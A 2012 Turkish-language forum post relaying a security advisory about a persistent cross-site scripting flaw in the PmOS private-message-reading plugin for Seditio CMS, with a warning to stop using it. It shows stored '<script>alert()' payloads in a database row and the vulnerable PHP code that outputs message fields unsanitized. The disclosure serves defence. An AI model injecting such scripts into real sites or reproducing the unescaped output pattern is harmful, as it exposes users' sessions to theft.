|
»Forumlar »SE ? SQL Injection
»Seditio CMS PmOS Plugin Multiple HTML Injection Vulnerabilities
https://seditio.com.tr/eski1/forums.php?m=posts&q=1884 |
| Author: Kaan, Posted: 2012-04-12 16:59 GMT. |
|
Seditio CMS PmOS Plugin Multiple HTML Injection Vulnerabilities Pm okuma eklentisinde Sql ?njection A???? bildirilmi? Bu nedenle A?a??daki linki verilen eklentiyi kullanmay?n. https://seditio.com.tr/eski1/sedi.....-d46.html Bildirilen Adres: http://www.securityfocus.com/bid.....eferences Exploit Attackers can use a browser to exploit these issues. Solution: Currently we are not aware of any vendor-supplied patches. Discussion PmOS plugin for Seditio CMS is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input. Attacker-supplied HTML and script code could be executed in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks may also be possible. PmOS - Pm Okuma Sistemi plugin for Seditio CMS suffers from a cross site scripting vulnerability. Kod: ============================================================================ Vulnerable Software: PmOS - Pm Okuma Sistemi [plugin for Seditio CMS]. https://seditio.com.tr/eski1/datas/users/1-pmoku.rar (MD5 SUM: 88235c2b4b0613bff87545d2d887f042 *1-pmoku.rar) https://seditio.com.tr/eski1/seditio-pm-okuma-eklentisi-d46.html ============================================================================ About Software: PmOS - Pm Okuma Sistemi [plugin for Seditio CMS] gives ability to administrators to read anothers PM's (Private messages) ============================================================================ Tested: With: Seditio 165 *php.ini MAGIC_QUOTES_GPC OFF* Safe mode off /* OS: Windows XP SP2 (32 bit) Apache: 2.2.21.0 PHP Version: 5.2.17.17 mysql> select version() -> ; +-----------+ | version() | +-----------+ | 5.5.21 | +-----------+ */ ============================================================================ Vuln Desc: Due Insufficent sanitization this plugin is prone Cross Site Scripting Vulnerability(Persistent Cross Site Scripting vuln) ============================================================================ No sanitization when fetching data from database. And thanks to Seditio cms again! It stores private message body in database without any sanitization: =========================================================================== mysql> select * from sed_pm \G *************************** 1. row *************************** pm_id: 6 pm_state: 0 pm_date: 1334009749 pm_fromuserid: 1 pm_fromuser: admin pm_touserid: 1 pm_title: <script>alert(1);</script> pm_text: <script>alert(2);</script> 1 row in set (0.00 sec) mysql> =========================================================================== Due trust to this issuse pmoku plugin is vulnerable to XSS. Vulnerable code section(From bottom: $pm_text = $row['pm_text']; will become unsanitized) //plugins/pmoku/pmoku.admin.php ----------------------------------------Snip ------------------------------------ $sql = sed_sql_query("SELECT * FROM sed_pm ORDER by pm_date DESC LIMIT 0,50"); $plugin_body .= "<h4>".$L['editdeleteentries']." :</h4>"; $plugin_body .= "<table class=\"cells\"><tr>"; $plugin_body .= "<td class=\"coltop\">".$L['Delete']."</td>"; $plugin_body .= "<td class=\"coltop\">Tarih</td>"; $plugin_body .= "<td class=\"coltop\">Gцnderen</td>"; $plugin_body .= "<td class=\"coltop\">Konu</td>"; $plugin_body .= "<td class=\"coltop\">Mesaj</td>"; $plugin_body .= "<td class=\"coltop\">Alan</td>"; $plugin_body .= "</tr>"; while ($row = sed_sql_fetcharray($sql)) { $pm_id = $row['pm_id']; $pm_date = @date($cfg['dateformat'], $row['pm_date'] + $usr['timezone'] * 3600); $pm_fromuser = $row['pm_fromuser']; $pm_title = $row['pm_title']; $pm_text = $row['pm_text']; $pm_touserid = $row['pm_touserid']; $plugin_body .= "<form id=\"saveallowlist_".$allowlist_id."\" action=\"admin.php?m=tools&p=adminallow&a=update&id=".$allowlist_id."\" method=\"post\">"; $plugin_body .= "<tr><td style=\"text-align:center;\">[<a href=\"admin.php?m=tools&p=pmoku&a=delete&id=".$pm_id."&".sed_xg()."\">x</a>]</td>"; $plugin_body .= "<td>$pm_date</td>"; $plugin_body .= "<td>$pm_fromuser</td>"; $plugin_body .= "<td>$pm_title</td>"; $plugin_body .= "<td>$pm_text</td>"; $plugin_body .= "<td>$pm_touserid</td>"; $plugin_body .= "<td><input type=\"submit\" class=\"submit\" value=\"".$L['Update']."\" /></td></tr></form>"; } $plugin_body .= "</table>"; ------------------------------EOF Snip ------------------------------------ Print screen: http://s019.radikal.ru/i617/1204/b2/9c434fd50926.png |
| Powered by Seditio | Print version |